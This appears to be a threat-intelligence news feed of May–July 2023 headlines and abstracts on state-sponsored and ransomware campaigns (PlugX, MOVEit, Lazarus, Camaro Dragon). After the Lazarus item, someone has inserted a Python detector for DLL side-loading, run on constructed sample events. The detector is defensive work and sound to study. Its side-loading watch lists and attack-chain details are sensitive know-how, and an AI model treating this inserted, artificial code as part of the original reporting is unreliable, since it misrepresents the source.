ASEC recently discovered that Crysis ransomware attackers were scanning the internet, via brute force or dictionary attacks, for vulnerable RDP endpoints to install Venus ransomware on systems. (Cyware)
July 04, 2023
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors
Abstract
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users," cybersecurity company Sekoia said in a technical write-up. DDoSia is attributed to a pro-Russian hacker group called NoName(057)16. Launched in 2022 and a successor of the Bobik botnet, the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan. Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different w (The Hacker News)
July 03, 2023
Chinese Hackers Use HTML Smuggling to Infiltrate European Ministries with PlugX
Abstract
A Chinese nation-state group has been observed targeting Foreign Affairs ministries and embassies in Europe using HTML smuggling techniques to deliver the PlugX remote access trojan on compromised systems. Cybersecurity firm Check Point said the activity, dubbed SmugX, has been ongoing since at least December 2022. "The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors," Check Point said. "Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar." The exact identity of the threat actor behind the operation is a little hazy, although existing clues point in the direction of Mustang Panda, which also shares overlaps with clusters tracked as Earth Preta, RedDelta, and Check Point's own d (The Hacker News)
June 30, 2023
Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks
Abstract
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiao (The Hacker News)
June 29, 2023
From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon
Abstract
The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom-made, actively developed framework has been leveraged in the February 2023 attack on Technion, an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers. "It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyber (The Hacker News)
June 29, 2023
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware
Abstract
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group. The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backd (The Hacker News)
June 29, 2023
Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor
Abstract
The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation. (Cyware)
June 27, 2023
The potent cyber adversary threatening to further inflame Iranian politics
Abstract
The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security. (Cyware)
June 26, 2023
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks
Abstract
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said. Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S. government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against (The Hacker News)
June 22, 2023
Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware
Abstract
The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare institu (The Hacker News)
June 22, 2023
Russian hacking group puts fresh emphasis on stealing credentials
Abstract
These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries. (Cyware)
June 21, 2023
ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks
Abstract
The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previously undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT, although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file -- (The Hacker News)
June 21, 2023
Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor
Abstract
Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in a European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group tha (The Hacker News)
June 19, 2023
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
Abstract
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers to infiltrate target networks. Palo Alto Networks said it dete (The Hacker News)
June 16, 2023
New Diicot Threat Group Targets SSH Servers with Brute-Force Malware
Abstract
Deploying Cayosin botnet, an off-the-shelf Mirai-based botnet agent, to target routers running the Linux-based OS OpenWRT is a newly adopted tactic, indicating that the group changes its attack style after examining its targets. (Cyware)
June 15, 2023
BreachForums Returns Under the Control of ShinyHunters Hackers
Abstract
The notorious hacking group ShinyHunters, which has been responsible for numerous massive data leaks in the past, has assumed control of the revived platform, raising alarm among cybersecurity experts and law enforcement agencies worldwide. (Cyware)
June 15, 2023
New Report Reveals Shuckworm’s Long-Running Intrusions on Ukrainian Organizations
Abstract
The Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments. Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec said in a new report shared with The Hacker News. "In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said. "The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more." Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to Russia's Fe (The Hacker News)
June 15, 2023
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
Abstract
Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate (GRU) and has a "relatively low success rate." The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586, has graduated it to a named actor dubbed Cadet Blizzard. "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company said. "While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard." Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel w (The Hacker News)
June 14, 2023
Chinese Hackers Exploit VMware Zero-Day to Backdoor Windows and Linux Systems
Abstract
The Chinese state-sponsored group known as UNC3886 has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as CVE-2023-20867 (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs," Mandiant said. UNC3886 was initially documented by the Google-owned threat intelligence firm in September 2022 as a cyber espionage actor infecting VMware ESXi and vCenter servers with backdoors named VIRTUALPITA and VIRTUALPIE. Earlier this March, the group was linked to the exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system to deploy implants on the network appliances and interact with the aforementioned malware. The threat actor has been described as a (The Hacker News)
June 05, 2023
Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App
Abstract
Microsoft has officially linked the ongoing active exploitation of a critical flaw in the Progress Software MOVEit Transfer application to a threat actor it tracks as Lace Tempest. "Exploitation is often followed by deployment of a web shell with data exfiltration capabilities," the Microsoft Threat Intelligence team said in a series of tweets today. "CVE-2023-34362 allows attackers to authenticate as any user." Lace Tempest, also called Storm-0950, is a ransomware affiliate that overlaps with other groups such as FIN11, TA505, and Evil Corp. It's also known to operate the Cl0p extortion site. The threat actor also has a track record of exploiting different zero-day flaws to siphon data and extort victims, with the group recently observed weaponizing a severe bug in PaperCut servers. CVE-2023-34362 relates to an SQL injection vulnerability in MOVEit Transfer that enables unauthenticated, remote attackers to gain access to the database and execute (The Hacker News)
June 5, 2023
Update: Ransomware Group Used MOVEit Exploit to Steal Data From Dozens of Organizations
Abstract
Mandiant has attributed the attack to UNC4857, a new threat cluster, and named the delivered webshell LemurLoot. Microsoft, on the other hand, is confident that the threat actor behind the Cl0p ransomware is responsible for the attack. (Cyware)
June 5, 2023
The Hidden Menace of the Terminator Antivirus Killer
Abstract
A threat actor was discovered promoting a tool called Terminator that can reportedly bypass 24 antivirus, EDR, and XDR solutions. However, CrowdStrike found that it uses a Bring Your Own Vulnerable Driver (BYOVD) attack. Presently, the vulnerable driver used by Terminator is only being identified b ... (Cyware)
June 02, 2023
Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering
Abstract
The Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of "basic machine enumeration and command execution via PowerShell or Goroutines." What the malware lacks in terms of sophistication, it makes up for when it comes to establishing redundant methods to retain access to the compromised host by means of multiple persistency tasks and varied methods to communicate with different servers. Camaro Dragon overlaps with a threat actor widely tracked as Mustang Panda, a state-sponsored group from China that is known to be active since at least 2012. The adversarial collective was recently in the spotlight for a custom bespoke firmware implant called Horse Shell that co-opts TP-Link routers into a mesh network capable of transmitting co (The Hacker News)
June 01, 2023
N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT
Abstract
Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that's employed by the North Korean state-sponsored actor known as ScarCruft. "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially maintain persistent control over compromised systems," ThreatMon said. ScarCruft, active since at least 2012, is a cyber espionage group that operates on behalf of the North Korean government, exclusively focusing on targets in its southern counterpart. The group is believed to be a subordinate element within North Korea's Ministry of State Security (MSS). Attack chains mounted by the group have leaned heavily on social engineering to spear-phish victims and deliver payloads onto target networks. This includes exploiting vulnerabilities in Hancom's Hangul Word (The Hacker News)
May 31, 2023
Threat actors are exploiting Barracuda Email Security Gateway bug since October 2022
Abstract
A recently disclosed zero-day flaw in Barracuda Email Security Gateway (ESG) appliances had been actively exploited by attackers since October 2022. The network security solutions provider Barracuda recently warned customers that some of its Email Security... (Security Affairs)
May 31, 2023
Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months
Abstract
Enterprise security firm Barracuda on Tuesday disclosed that a recently patched zero-day flaw in its Email Security Gateway (ESG) appliances had been abused by threat actors since October 2022 to backdoor the devices. The latest findings show that the critical vulnerability, tracked as CVE-2023-2868 (CVSS score: N/A), has been actively exploited for at least seven months prior to its discovery. The flaw, which Barracuda identified on May 19, 2023, affects versions 5.1.3.001 through 9.2.0.006 and could allow a remote attacker to achieve code execution on susceptible installations. Patches were released by Barracuda on May 20 and May 21. "CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances," the network and email security company said in an updated advisory. "Malware was identified on a subset of appliances allowing for persistent backdoor access. Evidence of data exfiltration was identified on a subset of impacted appliance (The Hacker News)
May 30, 2023
Hackers Win $105,000 for Reporting Critical Security Flaws in Sonos One Speakers
Abstract
Multiple security flaws uncovered in Sonos One wireless speakers could be potentially exploited to achieve information disclosure and remote code execution, the Zero Day Initiative (ZDI) said in a report published last week. The vulnerabilities were demonstrated by three different teams from Qrious Secure, STAR Labs, and DEVCORE at the Pwn2Own hacking contest held in Toronto late last year, netting them $105,000 in monetary rewards. The list of four flaws, which impact Sonos One Speaker 70.3-35220, is as follows: CVE-2023-27352 and CVE-2023-27355 (CVSS scores: 8.8), unauthenticated flaws that allow network-adjacent attackers to execute arbitrary code on affected installations; CVE-2023-27353 and CVE-2023-27354 (CVSS score: 6.5), unauthenticated flaws that allow network-adjacent attackers to disclose sensitive information on affected installations. While CVE-2023-27352 stems from the processing of SMB directory query commands, CVE-2023-27355 exists within the MPEG-TS pars (The Hacker News)
May 29, 2023
Tortoiseshell Eyes Israeli Logistics Industry
Abstract
Alleged Iranian nation-state hacker group Tortoiseshell performed a watering hole attack on several shipping and logistics websites in Israel to collect information about their users. Attackers stay hidden by impersonating the genuine jQuery JavaScript framework. Organizations are urged to raise aw ... (Cyware)
May 25, 2023
Brazilian hackers target Portuguese financial institutions Full Text
Abstract
A Brazilian hacking crew targeted users of over 30 Portuguese financial institutions earlier this year in a campaign that provides the latest example of financially motivated hackers in Brazil hitting foreign targets, according to SentinelLabs. (Cyware)
May 25, 2023
Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware Full Text
Abstract
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations. Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections. Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater. It's known to be active since at least December 2020. In December 2022, the hacking crew was linked to a set of attempted disruptive intrusions directed against diamond industries in South Africa, Israel, and Hong Kong. These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++. "The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabil... (The Hacker News)
May 24, 2023
N. Korean Lazarus Group Targets Microsoft IIS Servers to Deploy Espionage Malware Full Text
Abstract
The infamous Lazarus Group has been targeting vulnerable versions of Microsoft Internet Information Services (IIS) servers as an initial breach route to deploy malware on targeted systems. The findings come from the AhnLab Security Emergency response Center (ASEC), which detailed the advanced persistent threat's (APT) continued abuse of DLL side-loading techniques to run arbitrary payloads. "The threat actor places a malicious DLL (msvcr100.dll) in the same folder path as a normal application (Wordconv.exe) via the Windows IIS web server process, w3wp.exe," ASEC explained. "They then execute the normal application to initiate the execution of the malicious DLL." DLL side-loading, similar to DLL search-order hijacking, refers to the proxy execution of a rogue DLL via a benign binary planted in the same directory. Lazarus, a highly-capable and relentless nation-state group linked to North Korea, was most recently spotted leveraging the same t... (The Hacker News)
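The chain ASEC describes (w3wp.exe launches a benign Wordconv.exe, which then loads a planted msvcr100.dll from its own folder) leaves two correlatable traces in endpoint telemetry. The following detector is an added example for this page, not ASEC's or Lazarus's code: it walks Sysmon-style ProcessCreate and ImageLoad events, flags the IIS worker spawning an unexpected child, and flags a process loading a well-known runtime DLL from its own directory rather than a Windows system directory, rating the combination high. The trusted directories, the DLL watch list beyond msvcr100.dll, the expected-children list and the event records are all assumptions constructed for the example.

```python
"""Side-loading detector for the w3wp.exe -> Wordconv.exe -> msvcr100.dll chain.
Added example; events below are constructed, not real telemetry."""
import ntpath

# Directories from which CRT/system DLLs legitimately load (assumption: default install paths).
TRUSTED_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# DLL names commonly planted beside a benign binary; msvcr100.dll is from the page, the rest are assumptions.
WATCHED_DLL_NAMES = {"msvcr100.dll", "msvcr120.dll", "version.dll", "dbghelp.dll"}
# Children the IIS worker is expected to spawn on this host (assumption; tune per environment).
EXPECTED_W3WP_CHILDREN = {"conhost.exe", "csc.exe", "cvtres.exe"}


def _norm(path):
    """Lower-case, normalised Windows path so comparisons ignore case and slash style."""
    return ntpath.normpath(path).lower()


def _in_trusted_dir(dll_dir):
    return any(dll_dir == t or dll_dir.startswith(t + "\\") for t in TRUSTED_DLL_DIRS)


def scan(events):
    """Walk events in time order and return (severity, message) findings."""
    spawned_by_w3wp = set()  # pids of processes the IIS worker launched
    findings = []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            parent = ntpath.basename(_norm(ev["parent_image"]))
            child = ntpath.basename(_norm(ev["image"]))
            if parent == "w3wp.exe":
                spawned_by_w3wp.add(ev["pid"])
                if child not in EXPECTED_W3WP_CHILDREN:
                    findings.append(("medium", f"w3wp.exe spawned unexpected child {ev['image']}"))
        elif ev["type"] == "ImageLoad":
            dll = _norm(ev["image_loaded"])
            if ntpath.basename(dll) not in WATCHED_DLL_NAMES:
                continue
            dll_dir = ntpath.dirname(dll)
            if _in_trusted_dir(dll_dir):
                continue  # loaded from System32/SysWOW64/WinSxS: normal
            host = _norm(ev["image"])
            if dll_dir != ntpath.dirname(host):
                continue  # side-loading needs the DLL next to the host binary
            sev = "high" if ev["pid"] in spawned_by_w3wp else "medium"
            findings.append((sev, f"{ntpath.basename(host)} (pid {ev['pid']}) loaded "
                                  f"{ntpath.basename(dll)} from {dll_dir}"))
    return findings


# Constructed sample telemetry mirroring the reported chain (not real data).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 4242, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\inetpub\wwwroot\upload\Wordconv.exe"},
    {"type": "ImageLoad", "pid": 4242, "image": r"C:\inetpub\wwwroot\upload\Wordconv.exe",
     "image_loaded": r"C:\inetpub\wwwroot\upload\msvcr100.dll"},
    {"type": "ImageLoad", "pid": 1337, "image": r"C:\Program Files\Acme\acme.exe",
     "image_loaded": r"C:\Windows\System32\msvcr100.dll"},
    {"type": "ProcessCreate", "pid": 5150, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\conhost.exe"},
    {"type": "ImageLoad", "pid": 999, "image": r"C:\Users\jdoe\AppData\Local\Tool\tool.exe",
     "image_loaded": r"C:\Users\jdoe\AppData\Local\Tool\version.dll"},
]

if __name__ == "__main__":
    for sev, msg in scan(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {msg}")
```

The directory comparison is the important part: a CRT DLL loading from System32 is noise, the same name loading from the web root next to the host binary is the side-load. Correlating with the parent pid is what lifts the Wordconv.exe case to high while a stand-alone user tool gets medium.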
May 22, 2023
Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade Full Text
Abstract
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought. The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016. "While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week. The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone audio, log keystrokes, grab passwords, and harvest Gmail inboxes. Bad Magic was first documented by the company in March 2023, detail... (The Hacker News)
May 20, 2023
UNC3944 Threat Group Uses Azure Built-in Tools to Abuse Azure VMs Full Text
Abstract
The financially motivated UNC3944 gang was found using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines to steal data from victim organizations. The threat actor gains initial access to an Azure administrator's account by using stolen creden... (Cyware)
May 18, 2023
Russian Hackers Target Ukrainians’ Personal Data, Says Kyiv Full Text
Abstract
Ukraine's top cybersecurity agency says Russian hackers took a sudden interest in obtaining personal data and mounted successful attacks against more than one-third of the country's largest insurers. (Cyware)
May 17, 2023
ESXi Servers Face New Threats From MichaelKors RaaS Affiliates Full Text
Abstract
Group-IB infiltrated the infrastructure of MichaelKors RaaS to divulge never-before-heard secrets of its affiliate nexus, which would often target critical sector entities. For instance, affiliates take back 80-85% of the ransomware payments. The common attack tactics used by MichaelKors include ph... (Cyware)
May 17, 2023
OilAlpha: Emerging Houthi-linked Cyber Threat Targets Arabian Android Users Full Text
Abstract
A hacking group dubbed OilAlpha with suspected ties to Yemen's Houthi movement has been linked to a cyber espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula. "OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets," cybersecurity company Recorded Future said in a technical report published Tuesday. "It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices." OilAlpha is the new cryptonym given by Recorded Future to two overlapping clusters previously tracked by the company under the names TAG-41 and TAG-62 since April 2022. TAG-XX (short for Threat Activity Group) is the temporary moniker assigned to emerging threat groups. The assessment that the adversary is acting in the interest of the Houthi movement is base... (The Hacker News)
May 17, 2023
Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover Full Text
Abstract
A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments. Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944, which is also known as Roasted 0ktapus and Scattered Spider. "This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said. The emerging adversary, which first came to light late last year, is known to leverage SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022. Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associated... (The Hacker News)
May 17, 2023
State-Sponsored Sidewinder Hacker Group’s Covert Attack Infrastructure Uncovered Full Text
Abstract
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China. This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News. "The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said. SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments. The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippi... (The Hacker News)
May 16, 2023
Hackers use Azure Serial Console for stealthy access to VMs Full Text
Abstract
A financially motivated cybergang tracked by Mandiant as 'UNC3944' is using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines. (BleepingComputer)
May 16, 2023
Hackers infect TP-Link router firmware to attack EU entities Full Text
Abstract
A Chinese state-sponsored hacking group named "Camaro Dragon" infects residential TP-Link routers with a custom "Horse Shell" malware used to attack European foreign affairs organizations. (BleepingComputer)
May 16, 2023
Pro-Houthi hacking group linked to spyware operation on Arabian Peninsula Full Text
Abstract
From April to May 2022, as Saudi Arabia hosted negotiations between Yemeni leaders involved in the nearly decade-long civil war, OilAlpha sent malicious Android files through WhatsApp to political representatives and journalists, researchers noted. (Cyware)
May 16, 2023
China’s Mustang Panda Hackers Exploit TP-Link Routers for Persistent Attacks Full Text
Abstract
The Chinese nation-state actor known as Mustang Panda has been linked to a new set of sophisticated and targeted attacks aimed at European foreign affairs entities since January 2023. An analysis of these intrusions, per Check Point researchers Itay Cohen and Radoslaw Madej, has revealed a custom firmware implant designed explicitly for TP-Link routers. "The implant features several malicious components, including a custom backdoor named 'Horse Shell' that enables the attackers to maintain persistent access, build anonymous infrastructure, and enable lateral movement into compromised networks," the company said. "Due to its firmware-agnostic design, the implant's components can be integrated into various firmware by different vendors." The Israeli cybersecurity firm is tracking the threat group under the name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich. The exact method used... (The Hacker News)
May 16, 2023
Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems Full Text
Abstract
A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems. That's according to findings from SentinelOne, which observed an increase in the number of Geacon payloads appearing on VirusTotal in recent months. "While some of these are likely red-team operations, others bear the characteristics of genuine malicious attacks," security researchers Phil Stokes and Dinesh Devadoss said in a report. Cobalt Strike is a well-known red teaming and adversary simulation tool developed by Fortra. Owing to its myriad capabilities, illegally cracked versions of the software have been abused by threat actors over the years. While post-exploitation activity associated with Cobalt Strike has primarily singled out Windows, such attacks against macOS are something of a rarity. In May 2022, software supply chain firm Sonatype disclosed details of a rogue Python package called "pymafka"... (The Hacker News)
May 10, 2023
DownEx cyberespionage operation targets Central Asia Full Text
Abstract
A new sophisticated malware strain, dubbed DownEx, was involved in attacks aimed at government organizations in Central Asia. In late 2022, Bitdefender Labs researchers first observed a highly targeted cyberattack targeting foreign government... (Security Affairs)
May 09, 2023
Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps Full Text
Abstract
A gambling company in the Philippines was the target of a China-aligned threat actor as part of a campaign that has been ongoing since October 2021. Slovak cybersecurity firm ESET is tracking the series of attacks against Southeast Asian gambling companies under the name Operation ChattyGoblin. "These attacks use a specific tactic: targeting the victim companies' support agents via chat applications – in particular, the Comm100 and LiveHelp100 apps," ESET said in a report shared with The Hacker News. The use of a trojanized Comm100 installer to deliver malware was first documented by CrowdStrike in October 2022. The company attributed the supply chain compromise to a threat actor likely with associations to China. The attack chains leverage the aforementioned chat apps to distribute a C# dropper that, in turn, deploys another C# executable, which ultimately serves as a conduit to drop a Cobalt Strike beacon on hacked workstations. Also highlighted in ESET'... (The Hacker News)
May 08, 2023
SideCopy Using Action RAT and AllaKore RAT to infiltrate Indian Organizations Full Text
Abstract
The suspected Pakistan-aligned threat actor known as SideCopy has been observed leveraging themes related to the Indian military research organization as part of an ongoing phishing campaign. This involves using a ZIP archive lure pertaining to India's Defence Research and Development Organization (DRDO) to deliver a malicious payload capable of harvesting sensitive information, Fortinet FortiGuard Labs said in a new report. The cyber espionage group, with activity dating back to at least 2019, targets entities that align with Pakistan government interests. It's believed to share overlaps with another Pakistani hacking crew called Transparent Tribe. SideCopy's use of DRDO-related decoys for malware distribution was previously flagged by Cyble and Chinese cybersecurity firm QiAnXin in March 2023, and again by Team Cymru last month. Interestingly, the same attack chains have been observed to load and execute Action RAT as well as an open source remote ac... (The Hacker News)
May 6, 2023
Kimsuky Enhances its BabyShark Recon Tool in a Global Campaign Full Text
Abstract
